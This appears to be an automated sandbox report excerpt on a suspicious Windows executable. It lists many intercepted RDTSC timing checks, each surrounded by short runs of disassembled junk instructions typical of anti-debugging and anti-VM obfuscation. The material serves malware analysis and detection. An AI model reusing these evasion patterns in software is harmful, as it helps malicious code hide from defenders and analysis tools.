Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC388C second address: CC3901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC19D472F39h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnl 00007FC19D472F26h 0x00000010 jmp 00007FC19D472F33h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jnc 00007FC19D472F3Bh 0x0000001f push ecx 0x00000020 jmp 00007FC19D472F2Fh 0x00000025 jnc 00007FC19D472F26h 0x0000002b pop ecx 0x0000002c js 00007FC19D472F2Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C69990 second address: C699AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC19CEC1DD7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC44D5 second address: CC44E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC19D472F26h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC44E4 second address: CC44E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC44E8 second address: CC4503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jmp 00007FC19D472F2Eh 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC4B50 second address: CC4B57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC4B57 second address: CC4B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC4B60 second address: CC4B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC4B64 second address: CC4B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC9B53 second address: CC9B78 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FC19CEC1DDBh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC9B78 second address: CC9B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCDB19 second address: CCDB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FC19CEC1DCCh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCDB30 second address: CCDB41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19D472F2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCDB41 second address: CCDB45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCDB45 second address: CCDB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCDB50 second address: CCDB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCDB5A second address: CCDB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCCFDD second address: CCCFE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCCFE3 second address: CCCFFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F33h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCCFFB second address: CCD001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCD447 second address: CCD44B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCD703 second address: CCD72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19CEC1DD3h 0x00000009 jns 00007FC19CEC1DC6h 0x0000000f jmp 00007FC19CEC1DCEh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCD8A1 second address: CCD8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FC19D472F36h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD4AC5 second address: CD4AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD523B second address: CD5240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD5240 second address: CD5246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD5246 second address: CD524A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD524A second address: CD5256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD5948 second address: CD594C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD594C second address: CD595A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC19CEC1DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD595A second address: CD5970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19D472F32h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CDD10A second address: CDD146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007FC19CEC1DD1h 0x00000011 jmp 00007FC19CEC1DCBh 0x00000016 pop ecx 0x00000017 jl 00007FC19CEC1DC8h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 je 00007FC19CEC1DC6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CDD146 second address: CDD160 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC19D472F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC19D472F30h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CEA90C second address: CEA910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CEA910 second address: CEA923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CEA923 second address: CEA92D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FC19CEC1DC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CF58E9 second address: CF58EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0856A second address: D08572 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D08572 second address: D08577 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D089DF second address: D089E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D089E3 second address: D089EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D089EC second address: D089F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D08CE8 second address: D08D05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F30h 0x00000007 ja 00007FC19D472F26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D08D05 second address: D08D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D08D0B second address: D08D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D08D11 second address: D08D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FC19CEC1DC6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D09907 second address: D0990D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0990D second address: D0993D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC19CEC1DCEh 0x0000000a pop esi 0x0000000b push ecx 0x0000000c jmp 00007FC19CEC1DD5h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0993D second address: D09941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0C494 second address: D0C4B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C186D9 second address: C186DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C186DF second address: C186E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0C320 second address: D0C330 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC19D472F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0C330 second address: D0C334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0C334 second address: D0C347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0E531 second address: D0E555 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DCEh 0x00000007 jmp 00007FC19CEC1DD2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0E555 second address: D0E582 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jl 00007FC19D472F26h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 jmp 00007FC19D472F37h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0E582 second address: D0E599 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FC19CEC1DD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D500E0 second address: D500EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D500EA second address: D500F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FC19CEC1DC6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D51792 second address: D51798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D51798 second address: D517B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FC19CEC1DC8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007FC19CEC1DCCh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D6004E second address: D6006D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FC19D472F26h 0x0000000d jmp 00007FC19D472F30h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D6006D second address: D60072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D60072 second address: D60077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D60077 second address: D60084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnc 00007FC19CEC1DD2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D60084 second address: D6008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E25B27 second address: E25B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19CEC1DCAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E25F83 second address: E25FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC19D472F33h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E25FA0 second address: E25FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007FC19CEC1DD0h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E25FBD second address: E25FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC19D472F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E25FC7 second address: E25FD5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC19CEC1DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E25FD5 second address: E25FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E25FD9 second address: E25FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FC19CEC1DC6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E25FE7 second address: E25FED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E26145 second address: E2615B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007FC19CEC1DC6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E2615B second address: E26167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E26167 second address: E2616D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E2616D second address: E2617C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FC19D472F26h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E2617C second address: E26180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E26180 second address: E26199 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FC19D472F30h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E290BF second address: E290C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E29196 second address: E291C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FC19D472F31h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E29386 second address: E2938A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E2938A second address: E293A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E293A2 second address: E293A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E293A6 second address: E293AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E29437 second address: E2943B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E2943B second address: E29441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E2C85B second address: E2C861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E2E4A2 second address: E2E4DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jc 00007FC19D472F26h 0x0000000c jo 00007FC19D472F26h 0x00000012 jno 00007FC19D472F26h 0x00000018 popad 0x00000019 push ebx 0x0000001a pushad 0x0000001b popad 0x0000001c jnl 00007FC19D472F26h 0x00000022 pop ebx 0x00000023 popad 0x00000024 pushad 0x00000025 jne 00007FC19D472F32h 0x0000002b push eax 0x0000002c push edx 0x0000002d push edx 0x0000002e pop edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E2E4DF second address: E2E4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E2E4E3 second address: E2E50D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jo 00007FC19D472F26h 0x00000010 jmp 00007FC19D472F30h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
